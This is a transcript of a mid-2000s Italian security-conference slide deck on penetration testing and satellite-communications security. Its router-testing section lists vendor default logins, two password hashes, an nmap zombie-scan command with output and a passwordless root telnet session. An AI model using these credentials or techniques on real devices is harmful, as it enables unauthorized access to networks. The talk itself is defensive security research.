Security - SAT Expo

Transcript

Security - SAT Expo

Sicurezza informatica via cavo, wireless e satellite:segreti e soluzioni, II sessione
[ PROACTIVE SECURITY AND FIELD EXPERIENCES ]
Raoul Chiesa
Founder & CTO, @ Mediaservice.net
Divisione Sicurezza Dati/DSD-LAB
Steering Committee, CLUSIT
Italian Association for the Computer Security
Board of Director’s Member, Director of Communications, ISECOM
Institute for Security and Open Methodologies, USA
Authorized International Trainer, ISECOM
OPST & OPSA Official Certification Programs
Southern Europe Reference Member, T.S.T.F.
Telecom Security Task Force, USA, EU, ASIA
COPYRIGHT
Questo insieme di slide è protetto dalle leggi sul copyright e dalle disposizioni dei
trattati internazionali.
Il titolo ed i copyright relative alle slide (ivi inclusi, ma non limitatamente a, ogni
immagine, fotografia, animazione, video e testo) sono di proprietà degli autori
indicati.
Le slide possono essere riprodotte ed utilizzate liberamente dagli istituti di ricerca,
scolastici ed universitari afferenti al Ministero della Pubblica Istruzione per scopi
istituzionali, non a fine di lucro.
Ogni altro utilizzo o riproduzione (ivi incluse, ma non limitatamente a, le riproduzioni
a mezzo stampa, su supporti magnetici o su reti informatiche locali e pubbliche) in
toto o in parte è vietata, se non esplicitamente autorizzata per iscritto, a priori, da
parte del/degli autore/i.
L’informazione contenuta in queste slide è ritenuta essere accurata alla data della
pubblicazione. Essa è fornita per scopi meramente didattici e non per essere
utilizzata in progetti di impianti, prodotti, ecc.
L’informazione contenuta in queste slide è soggetta a cambiamenti senza preavviso.
L’autore non si assume alcuna responsabilità per il contenuto di queste trasparenze
(ivi incluse, ma non limitatamente a, la correttezza, completezza, applicabilità ed
aggiornamento dell’informazione).
In ogni caso non può essere dichiarata conformità all’informazione contenuta in
queste slide.
In ogni caso questa nota di copyright non deve mai essere rimossa e deve essere
riportata anche in utilizzi parziali.
(C) 1996-2004 Raoul Chiesa
(C) 2002-2004 @ Mediaservice.net Srl
AGENDA
14.45 – AN INTRODUCTION TO PROACTIVE SECURITY
• The company
• The speaker
• What we do
• Our clients
• Proactive Security
• Schools & methodologies
• ISECOM’s Security Proactive Square
15.30 - IT SECURITY AND SAT COMMS: THE LINKS
• Applying Proactive to the world of satellite’s communications: a real overview
• Typical security issues
THE SATELLITE AND THE BUSINESS WORLD: A CASE STUDY ON END-USER
APPLICATIONS
• Finance environments
• Editorial group environments
• Telecommunications environments
16.15 – ASSET & PROBLEMS: HISTORICAL ISSUES AND FIELD EXPERIENCES
• Smart Card, Decoder, Router, NoC, Dealers
• Penetration Testing Case Studies
ZOOM: SAT ROUTER’S FIELD EXPERIENCES (BLACK BOX SECURITY TESTING)
• Router X
• Router Y
16.45 - (A THEORICAL) CASE STUDY: SAT-OPERATOR SECURITY
• Points of attack
• Vulnerabilities: Devices, Applications, Network
• Lessons that have been learnt
SECURITY SAT-COMMS R&D: SOME RESULTS ON ROUTER’S SECURITY
17.15 - Q&A
THE COMPANY
• We’r not a “dot-com sec-company” [Est. 1997]
• Privately owned by security professionals, no VCs
• Vendor-independent: no resell, no (re)distribute !
• D.S.D. ( Data Security Division ) since 1998
• Wide Background, Direct Experience
• Internal Tiger Team (’99)
• On-the-Edge consulting expertise
• Unconventional technologies builder
• Vendors & Carriers External Audit Team
• Strong R&D ( national/intl: scouting, black-box testing, distributed
research, contributes to the world’s security community )
• Top & Large Companies’s final choice ( Corporate, Telco, IT, Industry,
Chemical, Editorial, Finance, Healthcare and P.A. Environments )
• Third-party selected partnerships
THE SPEAKER
• Hacking skills started back in 1986
• From 1989 to 1995 high level hacking and phreaking
experiences
• Ice Trap operation, 1995-96: SCO/FBI, Interpol,
Criminalpol
• Co-Founder of @ Mediaservice.net in 1997 (a l0pht focus)
• Papers & articles for standard and specialized press
• Interviews with mass-media (independent point of view)
CLUSIT, ISECOM, TSTF Member of the Board
CLIENT PORTFOLIO (EXTRACT)
Arma dei Carabinieri (ROS, Central Command in Rome),
Hospital S. Giovanni Battista, Torino (Ospedale delle Molinette),
Banca Mediocredito Friuli Venezia Giulia, Bo*frost SpA, Bulgari
SpA, CNR di Milano (Security Task Force) Telecom Italia SpA
(Italy and abroad group companies), Editorial Group
“L’Espresso” (La Repubblica, Kataweb, Radio DJ, etc..),
ITC/ILO - International Training Center of the ILO (ONU),
Mirato SpA (Malizia, Clinians and Intesa brands –
pharmaceutical/chemical sector), NoiCom SpA, Pirelli SpA –
Corporate Security Department, TIM SpA, Vodafone Omnitel
SpA, University of Udine, University of Milano (DSI), UNICRI –
United Nations Interregional Crime and Justice Research
Institute (ONU), Zyxel Telecommunications Inc. (TAIWAN),
Watchguard Technologies Inc. (USA).
WHO WE ARE
• An independent team of security professionals
• +10 years expertise in high-level penetration testing &
security consulting
• Specialized in telco and corporate environments
• Independent researchers, independent auditors
• We enjoy “impossible” missions and hard-to-solve
security issues
• T.S.T.F. International Consulting Team Members (+40
telecommunication operators audited in 4 USA, Australia,
Asia, Europe)
We’r not the ones that “talk”, we’re the ones that AUDIT,
TEST, REPORT.
WHAT WE DO
• Proactive Security
(I’m going to explain you this)
• Real-Time Security
- Secured Production Systems (Web, Mail, FTP and SMS systems)
- Defense Systems (Firewall, xIDS and Monitoring systems
- Security Managed Services
- S.O.C.
• Post-Attack Security
- Log Analysis
- Computer Forensics
- Criminal Profiling
• Specialized Security Training
- Certified Security Classes (OPST, OPSA)
- Ethical Hacking for Corporates
- L.E.A. Security (authorities only)
• IT & TLC Security Consulting
MEDIA RELATIONSHIPS (EXTRACT)
• Magazines/Newspapers:
Apogeo Editore, Fondazione Ugo Bordoni-Telèma,
Hackers & C, ICT Security Magazine, Il Sole 24 Ore
Internet News, Internos, La Repubblica, La Stampa, Linux
& C, MAX, Mondadori My Tech, Panorama/Panorama
Web, PC Magazine Italia, Zeusnews.
• Books:
Feltrinelli, Pearson Italia, Sperling & Kupfler, Apogeo
Editore: scientific supervisors and writers for italian editions
of specialized books and manuals.
Matrix Reloaded, The art of Deception, Security in
Computing and Hacking: The Art of Exploitation.
Proactive Security I
[ a basic intro ]
PROACTIVE SECURITY: WHAT’S THIS ?!?
Proactive Security = Act BEFORE
[and gain a better night-sleeping]
WHY IS IT SO IMPORTANT ?
Maybe for the consequences ?
•
Economic damages
• Company’s image damages
• Confidential informations and reserved projects theft
• Law responsabilities (both civil and penal)
• Resources abuse
• Violation of international practices and standards
• Revocation/suspension of certifications (ISO/BSI)
• … you really have many reasons to care of.
PROACTIVE SECURITY: from “schools”…
Yesterday..we used to have different “schools”:
- Automated testings (Vulnerability Scanning/Assessment)
“our scanner use A.I. on neural networks, and everything is in
HA“
- Manual testings (Ethical Hacking, Pentesting, Unconventional
Security Testing)
“we’ve got the most advanced & up-to-date hacking techniques”
“we have the best hackers in the world (or whatever)”
“...Uh, yeah, you know, we use lettonian people !”
- Security through Obscurity Security Testing
“...dear customer, you shouldn’t care about HOW we do it, that’s
our job and we know how to do it, but we can’t explain you the
‘whys’ and the ‘hows’ !”
PROACTIVE SECURITY: …to “methodologies”
- Vulnerability Scanning/Assessment
- Security Scanning
- Penetration Testing
- Risk Assessment
- Security Auditing
- Ethical Hacking
- Posture Assessment & Security Testing
DECISIONAL
FACTORS:
• Execution Costs
• Execution Timings
DISTINCTION FACTORS:
• Applied methodology
• Repetibility of the tests and comparision’s chance
• Numeric classification of the “risk values”
• Compliance with standards and legislations
(ISO/BSI, Privacy laws, company policies, …)
The PROs and the CONs
• Automatized (Vulnerability Scanning, Security Testing)
• Hand-made (Penetration Test, Ethical Hacking)
The first methodology is based on the quality of the securitytesting tool (a product); it’s not that easy to reproduce the tecnical
skill and motivations of an attacker… Would an hacker ever
buy a software to attack your company ?
We suggest the use of automated tools in order to plan cyclic
Internal Vulnerability Assessments, but it cannot be a serious
way to take a real screenshot of the existing situation and the
effective technical risk level.
The second technique produces the best results, but the testings
must be executed by a Tiger Team with huge and proved
expertise and skills.
TODAY: THE PROACTIVE SECURITY SQUARE
Proactive Security II
[ Know Your ENEMY ]
KNOW YOUR ENEMY: HACKER’S PROFILING
PSYCHOLOGICAL PROFILE
DANGEROUSNESS LEVEL
Wannabe Lamer
NULL
(I’d like to be an hacker, but I can’t…)
Script Kiddie
LOW
(The script boy)
Cracker
HIGH
(Burned ground, the Distructor)
Ethical Hacker
MEDIUM
(The “ethical” hacker’s world)
Quiet, paranoid, skilled hacker
MEDIUM
(The very specialized and paranoid attacker)
Cyber-Warrior
HIGH
(The soldier, hacking for money)
Industrial Spy
HIGH
(Industrial espionage)
Government agent
HIGH
(Governative agent: CIA, Mossad, FBI, etc. – Cuckoo’s Egg docet)
KNOW YOUR ENEMY: TARGETS
PSYCHOLOGICAL PROFILE
TARGET
Wannabe Lamer
End-user
(I’d like to be an hacker, but I can’t…)
Script Kiddie
SME/specific security flaws
(The script boy)
Cracker
Big Companies/PA/Finance/Telco
(Burned ground, the Distructor)
Ethical Hacker
Vendor/System Integrator/Telco
(The “ethical” hacker’s world)
Quiet, paranoid, skilled hacker
Big Companies/PA/Finance/Telco/R&D
(The very specialized and paranoid attacker)
Cyber-Warrior
Multinationals “symbol”
(The soldier, hacking for money)
Industrial Spy
Multinationals, ICT companies
(Industrial espionage)
Government agent
Multinationals/Governments
(Governative agent: CIA, Mossad, FBI, etc. – Cuckoo’s Egg docet)
Attack tools grown up, intruder’s skills went down!
BACK !
THE PROACTIVE SECURITY SQUARE
SECURITY TESTING: HOW IT WORKS
Ok, what’s in these “verification actions” ?
Using different actions of Vulnerability
Scanning, Penetration Test or attacks via
Ethical Hacking, we actuate proactive
verification systems, useful to point out
weaknesses in the target systems, environments
or goal network
Deep Inside
EXTERNAL
INTERNAL
FROM THE EXTERNAL
Public Networks
• Leased TCP/IP lines
(CDN/CDA/ADSL/HDSL/F.R.)
• Packet Switching lines
(CDN or Frame Relay)
• Telephone lines (PSTN/ISDN)
• Satellite lines (mono/bidirectional)
• Mobile (GSM, GPRS, 3G)
FROM THE INTERNAL
• INSIDER ABUSE PROFILE
• INTERNAL L.A.N.
(via RAS or on-site)
• LAN-to-LAN PtP
• LAN-to-LAN Public
• LAN-to-LAN VPN
Private Networks with public gateways
• INTERNET linked
• Point-to-Point
• X.25/X.121
• DECnet
• SNA
• Dialin/Toll free access numbers
• RAS
• Suppliers gateways: SAP, trusted suppliers, trusted gateways, etc..
WHY HIRING AN EXTERNAL TIGER TEAM ?
• You obtain an objective and impartial test of your data
infrastructure
• External T.T.s often use unconventional verification
techniques, beyond the classic verification methodologies
• Already knowing your information technology systems =
interests conflict + useful informations for the attacks (e.g.
10 or 192.168 private IPs classes ? )
• Company’s preconceptions could influence a security
testing “home-made” (blind view issues)
• Third party confirmations supply guarantees to insurance
and financial partners, as well as to the customers.
CONSULTANT SELECTION: COMPANY OR FREELANCE ?
Single freelance:
• OK! He costs less: money (apparently) savings.
• NOT OK ...he does not have availability on particular apparals, skill
and infrastructures, in order to execute large-scale jobs or attacks on
specific medias (e.g. RAS, PBX, X.25, OS different from Microsoft,
Linux, Sun).
• compromise #1: problems on availability, immediate reponse, target
dimensions;
• compromise #2 : lower-profile testings, low-vision on the targets;
• compromise #3 : 3 heads work better that 1, we all know this: but if
this could lead to missing vulnerabilities discover, this will mean a
false sense of security on the client’s side.
OPERATING SYSTEMS TESTED IN +10 YEARS
- AOS/VS
- BBS Systems
- Bull PAD
- CICS/VTAM
- Cisco IOS
- CDC NOS – Control Data Corporation
- DEC VAX/VMS and AXP/OpenVMS
- DEC Ultrix
- DEC Terminal Decserver
- DG/UX Aviion General
- DOS
- DRS/NX
- GS/1
- HP 3000
- HP/UX 9000
- IBM Aix
- IBM OS/400 (AS/400)
- Northern Telecom PBXs
- IRIX SGI
- VM/370
- PACX/Starmaster (Starmaster Gandalf)
- Pick Systems
- PRIMOS Prime Computer
- RSTS
- SCO
- Shiva LAN Router
- Sun Solaris
- TOPS 10/20
- Unknown systems
- VCX Pad
- VM/CMS
- IRIS Operating System (PDP and others) - XENIX
- Linux
- Motorola XMUX (Gandalf)
- WANG Systems
MAIN CHECKINGS AND TESTS
Policies (External/Internal)
Passwords
Operating System (OS) Bugs
Applications Bugs
….
OUR METHODOLOGY APPROACH
ATTACK PHASES
Information Gathering
The goal of this phase is obtaining all the available informations about the
target, using public sources and tools.
Services scanning
In this second phase, the goal is obtaining all the available informations
regarding the active services’ of the target machine(s), as well as their versions and
releases.
Security flaws identification & PoC/Attack Phase
The goal here is to penetrate into the target system(s) and obtaining –
whenever it’s possible – full operating privileges on the machine; demonstrate the
theorized vulnerabilities; Proof of Concept using specific or “on-the-fly coded”
exploits.
Target Session
The fourth phase on the security verification process looks for
informations and trends on the target system itself; we also look for previous
(unknown) break-ins or intrusions and we try to define and understand the
management and administration level of the target box.
Security Report
The final Security Report contains: Executive Summary, Technical
Summary, Attack Sessions, Evidences, as well as Tested Environment
specifications, assigned Technical Risk Level, Suggestions and final Conclusions.
BACK AGAIN
THE PROACTIVE SECURITY SQUARE
VULNERABILITY ASSESSMENT (SCANNING)
THE PROACTIVE
SECURITY SQUARE (1/7)
YOU ARE
HERE
•
•
•
•
•
Level 1 in the Security Testing Quality standards
Automatized testings
English language reports “fits for everybody”
High number of false positive/negative
(fake alerts, fake “security sensation”
It just cares about the “IP” world
SECURITY SCANNING
THE PROACTIVE
YOU ARE
HERE
•
•
•
•
•
Automatized scannings, hand-made verifications
Final report in italian and english language
Manual tuning of the False Positives and Negatives
We keep on to take care only of the IP areas
PENETRATION TESTING
THE PROACTIVE
YOU ARE
HERE
•
•
Verification actions manually executed, following proprietary
methodologies (pentester’s personal background or attack team
specific know-hows)
Final report is directly written by the executing Tiger Team and
it’s sent in italian (or others) language to the final customer
You can bundle special testing services (optionally), sich as
Social Engineering,Trashing, Physical Intrusion, Web
Applications Security Testing, black-box penetration test, etc...
It does not stop at the “IP” world (RAS,X.25,DECnet,WiFi,Web, etc...)
The execution time grows up on each single tested asset
•
•
•
•
RISK ASSESSMENT
THE PROACTIVE
YOU ARE
HERE
•
•
•
•
•
Evaluation and correlation actions, toward the datas mined from
testing operations and the company’s risk values
Results can be generated from the 3 previous technical analysis’
methodologies
It needs a long exetion time
If the technical testings results are somehow “false”, the whole
risk analysis will pay the consequences (and the economic
investments as well !)
SECURITY AUDIT
THE PROACTIVE
YOU ARE
HERE
•
•
•
•
Auditing actions – tipically from the internal environment – of
the whole IT information infrastructure: the analysis looks at the
projectual, procedural and implementation points of view and
security issues, exposures and flaws.
It is manually executed, with a strong customizing final report,
based on the effective client’s needings, taking also under
consideration specific assets or company’s businesses.
It can be the final result of proactive security methodologies,
married with standard risk analysis methodologies (CRAMM,
etc..)
ETHICAL HACKING
THE PROACTIVE
YOU ARE
HERE
•
•
•
•
360° degree verification attacks, aimed towards specific assets,
services or infrastructures
It requires FULL OPERATING AUTHORIZATION + “Free to
Jail” (special options at point # 3)
It is executed using unified actions of:
1. Penetration Testing (IP, xSDN, X.25/X.121, SAT, WiFi,Web Applications, …)
2. Phreaking
3. Social Engineering, Physical Intrusion, Trashing
4. Reverse Engineering
5. Black Box Penetration Testing
CERTIFIED POSTURE SECURITY ASSESSMENT
THE PROACTIVE
YOU ARE
HERE
•
•
•
•
•
Top Level (7°) in the Security Testing Quality standard
Repeated verification and matching actions (follow-up), executed
in a time-frame defined and agreed with the client
The analysis are based on initial knowledge factors (expressed in
the vulnerabilities analysis, generated from the previous testing
actions) and they are executed in full respect of the OSSTMM
methodology (repeat and compare is possible, saving time &
money !) and of its RAVs – Risk Assessment Values
The final report is manually generated from the Tiger Team, it’s in
client’s language and it is compliance to international
guidelines and stadards, such as ISO/BSI, GAO, FISCAM
The Security Report is OSSTMM Certified
Proactive Security
&
SAT Security
[ the dangerous relationships ]
THE PROBLEM
•
•
•
•
The main Telecommunications vendors (Nokia, Ericsson, Alcatel,
etc.) are selling insecure software and systems to telcos.
Telecommunications operators have a very poor understanding of
security issues.
Based on 5 years penetration testing experiences, TLC operators
are the most vulnerable of all industry groups.
Sophisticated hackers have an increased interest in telco
security, communications and VAS hacking.
In the SAT environment the facts are even worst: no-one ever
cared about Proactive Security.
Contents resell (movies, shows, sit-coms, etc) is moving to H.323
and other IP-based protocol.
THE VENDORS
•
•
•
•
Some vendors have decided to take an active stance in security
(e.g. Nokia on GPRS, @Stake security advisories), however such
initiatives are isolated and do not address most TLC security
problems.
Most vendors sell antiquated software full of bugs, running old
and unpatched version of operating systems and daemons.
Operators cannot fix the identified security weaknesses because
it would void their warranty.
Lately in these years, vendors discovered Linux as a good
operating system for embedded applications: the security aspects
are usually “forgotten”.
The result of this ‘head in the sand’ approach is an increase in the
threat: critical infrastructures are at risk.
THE TLC OPERATORS
•
•
•
•
Operators rely on vendors for secure solutions.
Operators are primarily focused on network operations, software
upgrades, network performance and other time-consuming
routine tasks.
Operators lack in-house expertise on TLC and hacking security.
Operators are usually divided between the IT and Engineering,
departments, creating two separate security domains.
Most operators networks are open to hackers.
THE PARADIGMA
• Two different worlds, IT ed Engineering
• Very different priorities
SOME NUMBERS
•
Based on a 5-years study encompassing 21 network operators:
100% could be hacked from the Internet
90% could be hacked through PSTN, X.25 or ISDN.
72% had a security incident in the last 2 years
23% had appropriate perimeter security control
0% had all their mission-critical hosts secured
0% had comprehensive database security in place
0% had integrity measures protecting billing data
THE ENEMY
SAT fraud is still an attractive target:
•
•
•
•
Cloning smart-cards.
Bypassing toll, getting services without fees, setting up premium
subscriptions, etc. (web hacking, operator’s hacking).
Privacy invasions: interception of call-related data (e.g. contents,
signalling data, billing data) via device’s or Internet’s hacking.
Unauthorized Access: illegal access to the broadcasting center
and IT back-office.
Recently one underground group announced it was reverse
engineering Nokia software.
Groups of sophisticated hackers are working on abusing many
Sat-decoders running on embedded Linuxes.
A US-based research group is working on a “secure decoder”.
THE COMPETITION
•
•
•
•
Traditional security shops: no knowledge of TLC specific issues,
poor understanding of security procedures.
Traditional TLC consultancies: very poor knowledge of security
issues.
“Big 5” audit firms: focused on policies, no real expertise (they
outsource their jobs to people like us).
In-house resources: Very dangerous. Internal fraud overlooked.
Interdepartmental ego problems. Good security and bad security
looks the same.
DOING NOTHING…
• … with your sat and tlc infrastructures
today is like doing nothing with your
Internet hosts in the 90’s.
• It is an invitation for upcoming disasters.
TYPICAL SECURITY ISSUES
INTERNET LINK:
Firewalls not updated/managed
Lack of security policies
Errors in the secure network design (DMZ, direct access to
internal hosts, “bridge” systems not in a secured area)
PSTN/ISDN LINKS:
Not-presidiated access gateways (RAS, ISDN_Backup on
routers, …)
Missing hardening on RAS devices
Default passwords
Same phone numbers both for end-users (Pay-TV via xSTN) and
IT management
SAT-LINK:
Unsecure SAT device (SAT IP routers)
Missing hardening on SAT devices
Internal exploitation, interception of passing datas
END-USER APPLICATIONS & ASSETS
• FINANCE ENVIRONMENT: stock-exchange datas
download
• PRESS ENVIRONMENT: news from the agencies
• TLC ENVIRONMENT: Internet connectivity
ASSETS:
Smart Card/JAVA Card
Sat Decoder (STB)
Sat Router
Centre of Broadcasting
Dealers
clonable, breakable, reversable
easy to crash, RS-232 consolle
we’ll discuss about this later ☺
hackable
the weakest part of the chain
A THEORICAL CASE STUDY: CoB ATTACK
LAN 1
SIT
LAN 2
SIT
A THEORICAL CASE STUDY: CONTACT POINTS
When talking about IT Security, we must NOT forget that
attackers don’t use “just the Internet”
Process
Security
Physical
Security
Information
Security
Communications
Security
Internet Security
Wireless Security
A THEORICAL CASE STUDY: Internet Presence
ADMIN
INTRANET
ISP
NEWS
DMZ
NSI
Blue is considered
under control.
Red is in 3rd party
control.
SATELLITE
OFFICE
MOBILE
OFFICE
Yellow is 3rd party
where some control
can be maintained.
A THEORICAL CASE STUDY: Attack Points
ADMIN
INTRANET
ISP
NEWS
DMZ
INTERNIC
SATELLITE
OFFICE
Note the traditional
defense points.
Note what a hacker
can attack to cause
damage.
MOBILE
OFFICE
LET’S PLAY IT AS A “MOBILE TELCO”…
GSM Architecture
GSM Operations
Not WCS
Multiple
Fulfilment
Vendors.
Card
payments
& authorisation
BANK
Information access,
supply for Internet
information (APIs) and
Interactive TV
CARD
AUTHORISATION
ISCP
Reporting
DD payments
DD Returns
Security.
ISCP
SGSN
TAP
CLEARING
HOUSE
E-Wallet
Card payments
& authorisation
GGSN
IN
Platform
Certification and
encryption
WAP
BANK I/F
To WAP,
SMSC, IN
etc.
CARD PAYMENTS
Small
Purchases
(EFT)
Portal.
Information access
device for Internet
information (APIs)
DD payments
DD Returns
External Billing for
content supply
Roaming
call data
IVR
d
r an
me n data
sto
Cu riptio
sc
sub
VMS
Card payments
SMC
WWW
Customer and
subscription data,
and real time billing
CRM Tool
ID & Address
Validation
CREDIT CHECK
Customer details
Normalised address
Credit Scoring
Customer
Result of check
manages integration
of billing system and
external validation
agencies.
Customer details,
Credit score result
Billing System & Golden Database
Service requests
and responses
Customer and service administration, personalisation, content management,
tariffing, SIM and number management, provisioning requests, call data
collection, rating and billing (roaming, retail and interconnect), and payment
collection
Normalised
call data
Customer
Result of check
Bad Debt
Database
BLACKLIST ?
Subscriber data
Rated CDRs
Pre-pay CDRs
Unrated CDRs
Mediation
System
Collection and
normalisation of call
data, and transfer of
service requests to
GSM network
service requests,
and responses
AuC
HLR
BGW
Call data
SIM orders, dispatched SIMS,
Dispatch SIM
Dealer codes, activation
SIM orders, dealers codes
information, money back
GL updates & Roaming
deactivations,
general ledger updates
Ernie
SOG
Service activation
gateway
MSC
Billing gateway
Commissions
BANK I/F
Sales and Dealer
Data
Warehouse
PRINTING
SAP
SIM
SAP
Manufacturer
Sales support, logistics and finance processing, Human Resource, and Materials Management
Customer and
subscription changes
Document
Imaging
Electronic Queue
Manager
Service Centre Queue
measurement tool
Dealer information
POS
Activation
FRAUD
Multi
Media
Customer call
-Outbound
-Goods mvt inbound
-Picking conf. inbound
-Change serial# kits
-Physical inv. inbound
WCS Shops
Retail Outlets
Logistics
Company
Site rental Assets
Shops &
Dealers
Screen Navigation
Call (CLI)
Per call
ACD
Distribute customer
calls in call centre
Caller ID,
Service Level,
Preferred Language
CRM Tool
Query
type
Caller ID and
Preference
IVR
Identify customer,
preference and satisfy
simple queries
Tool
Diagnose problems and
recommend solutions
Screen
navigation
Predictive
Dialler
O/S
Operator services
Directory inquiries
IMS
Isaac
Case Based Reasoning
Manage customer
tasks to completion
Recommendation
IVR
Financial/Inventory
Material master
S
inc IM +
lud M
ing SIS
bla DN
ck nu
lis m
tin be
g I rs
ME
I
GIS
(Geographical Information
System)
Site, Dealer & Shops info
Signal strength and coverage
Scholar
Knowledge System
On-line call centre
reference
Radio planning
tool
Sites,
faults
& Links
Sites administration, BTS build
provision and transmission,
operations and network faults
logging
LET’S PLAY IT AS A “MOBILE TELCO”…
ZOOM: SAT ROUTER’S B.B. SECURITY TESTING
B.B.= BLACK BOX MODE when testing the security of a
device
What we tested:
Broadlogic Satellite Express XLT * (DVB to Multicast Router)
SatLynx BBI Astra
ViaSat LinkStar (ComSat Laboratories)
* Now become SkyStream EMR 5000 “Edge Media Router”
What we found:
1) LACK of security in default accounts
Web Management Interface:
•
Username: webadmin
Password: webadmin
Telnet Management Interface:
•
•
Username: admin
Username: installer
Password: admin
Password: installer
System Users (hash MD5):
• root:$1$t.TUJSEP$zZHajMrk7z.OQeRarFWkn1
• bsupport:$1$tAVIaSbI$0rvfQEs85kNelM/EoWD2R.
What we found:
2) Unsecure and bad-written web applications (CGIs, etc..)
Very common (and known) secure programming issues have
been found on all the tested devices.
What we found:
3) Proofed chances to abuse the device, launching attacks to other
hosts (extracts from original report follow…)
L’apparato da noi testato presenta una problematica sullo stack
TCP/IP; il campo IP ID dei pacchetti è incrementale, pertanto un
ipotetico attaccante può utilizzare il sistema come “ponte” per
lanciare port scan (zombie scan).
Tale operazione è effettuabile anche senza avere accesso diretto
al sistema. Un esempio pratico è illustrato di seguito: in questo
caso se nella rete fosse stato presente un IDS o un sistema di
rilevazione dei portscan, l’indirizzo di provenienza non sarebbe
quello dell’attaccante, ma quello del router XXXXX (con le ovvie
conseguenze legali, anche per l’attuale legislazione italiana).
Ulteriori informazioni su questa vulnerabilità possono essere
reperite all’indirizzo: http://www.insecure.org/nmap/idlescan.html
Procediamo ora ad una dimostrazione pratica di quanto affermato,
lanciando un port-scan sull’IP 10.200.8.12, indicando come IP
sorgente il 10.200.8.7 (router XXXXXX sotto “ZombieScan”).
root@Slap[~]: nmap -sI 10.200.8.7 -p 1,12,22,80,443,21 10.200.8.12
Starting nmap 3.30 ( http://www.insecure.org/nmap/ ) at 2003-09-08 11:18 CEST
Idlescan using zombie 10.200.8.7 (10.200.8.7:80); Class: Incremental
Interesting ports on 10.200.8.12:
(The 3 ports scanned but not shown below are in state: closed)
Port
State
Service
21/tcp open
ftp
80/tcp open
http
443/tcp open
https
Nmap run completed -- 1 IP address (1 host up) scanned in 3.597 seconds
root@Slap[~]:
What we found:
4) “Default” SNMP Community (public, private)
Some of the tested devices had SNMP capabilities. In all the cases,
the community used by SNMP used to be “default” ones.
(extract from the final reports)
“In general on all the tested SIT it is possible to
gain access on a number of system information,
but on a particular SIT it was possible to use the
default SNMP community (which cannot be
modified) to gain access to detailed system
information, such as the satellite coordinates.”
What we found:
5) TELNET access with NULL password (!)
In another black-box testing, we found a device with TELNET
opened and without a managing password….this is really
sad
root@Slap[]: telnet 10.200.8.1
Trying 10.200.8.1...
Connected to 10.200.8.1.
Escape character is '^]'.
Password:
Logged in as root
help
?
help
version alias
unalias delay
script
doscript setprompt repeat systat
mcbstat
mcbprt
memstat
syscnt
pbconf
sysconf
niprt
util
plog
ptime
echo
msgtrace nochkdest chkdest
putuseconput conolog
time
date
sendtime
uptime
bc
bread
read
lread
bwrite
write
lwrite
bcopy
bcmp
memtest
hwreset
reboot
setprad
restart
kill
setqsize poll
initp
resetp
devstart devstop
attach
unattach prtstat
show
clrstat
config
prtconfig enable
disable
setloop
clrloop
settrace prtcache reseticache passwd
rloginauth whoami
login
logout
rlogout exit nvram_fstat nvram_parms nvram_init nvram_open nvram_read
nvram_create nvram_write nvram_close nvram_copy nvram_lseek mdbselect mdbfiletype mdbread
mdbwrite mdbdatavalid dblist
dbprint
dbprintdef dbsetvalue dbsetfield dbadd
dbdelete
dbdeleteall ksetprint ethnrtsho ethprtsho ethnrtadd ethprtadd ethsetprom ethclrprom ethtest
ethenabcast ethdisbcast ethsetloop ethclrloop setipaddr
proxytcpstatus arpadd
arpdelete
arpproxyadd arpproxydel arpproxylist ping riproutes disproutecb addsroute showtree
showextnodes stressroute rtprt
nhtprt
hrtprt
rtlook
hrtlook
mrtprt addmroute
delmroute savebootparms switchbb
bbrcvrinfo setdbready kdbpr
R&D RESULTS: WHAT HAS BEEN LEARNT
(Extract from the main italian reports)
I test effettuati hanno rilevato gravi problematiche di sicurezza sugli
apparati satellitari, sia a livello progettuale che implementativo.
Sono inoltre ipotizzabili ulteriori vulnerabilità, rilevabili con analisi
specifiche più approfondite.
L’insieme delle vulnerabilità rilevate può portare alle seguenti tipologie di
abuso e frode:
Utilizzo del target device come sistema ponte per attacchi verso terzi e
conseguenti responsabilità legali (civili e penali);
Utilizzo del target device come “Zombie Scan” verso terzi e conseguenti
responsabilità legali (civili e penali);
Abusi e frodi economiche nel caso di connessione di tipo “a traffico” alla rete
Internet;
Intercettazione di tutto il traffico IP, da e verso il link satellitare;
Redirect del traffico IP, da e verso il link satellitare;
DoS, negazione di servizi;
Isolamento della connessione Internet satellitare;
Riconfigurazione dei servizi;
Installazione di strumenti di intercettazione dati sui segmenti LAN ove il device
è attestato.
R&D RESULTS: SOME TIPS
(Extract from the main italian reports)
Riteniamo possibile e consigliamo ai produttori la
stesura da parte di società terze ed indipendenti di
White Paper tecnici, Security ed Hardening Policy,
Configuration & Installation Security Guideline
per i dispositivi oggetto di analisi, al fine di prevenire
vulnerabilità e security exposure particolarmente
impattanti sugli utilizzatori finali.
Concludiamo sottolineando la necessità di security
testing anche dal lato delle connessioni satellitari
(IP), al fine di verificare la possibilità di abuso da
parte di attacker remoti e provenienti dalla rete
pubblica Internet.
DOMANDE & RISPOSTE
QUESTIONS & ANSWERS
CONTACTS
UNCONVENTIONAL TECHNOLOGIES FOR
THE CORPORATE SECURITY & IMAGE
Raoul Chiesa, Chief Technical Officer @ Mediaservice.net (OPST, OPSA)
Mail Contacts
[email protected]
[email protected]
[email protected]
Web Contacts
http://www.mediaservice.net/
http://osstmm.mediaservice.net/
http://www.TSTF.net/
http://www.isecom.org/
(General Enquiries)
(Security Enquiries)
(Personal Enquiries)

Security - SAT Expo

Transcript

Documenti analoghi

ABI_Basilea 2016_CV Diego Travaini

GlobalTrust RMS

Matteo Meucci

Alessandro RIZZO - 3-esse

Clicca qui per scaricare la scheda completa.

allegato pdf

Nasce AETP: la prima Accademia per la formazione professionale di

Curriculum vitae - Marco Fiaschetti

IPSEC SA security association definizione

Convegno Travel Security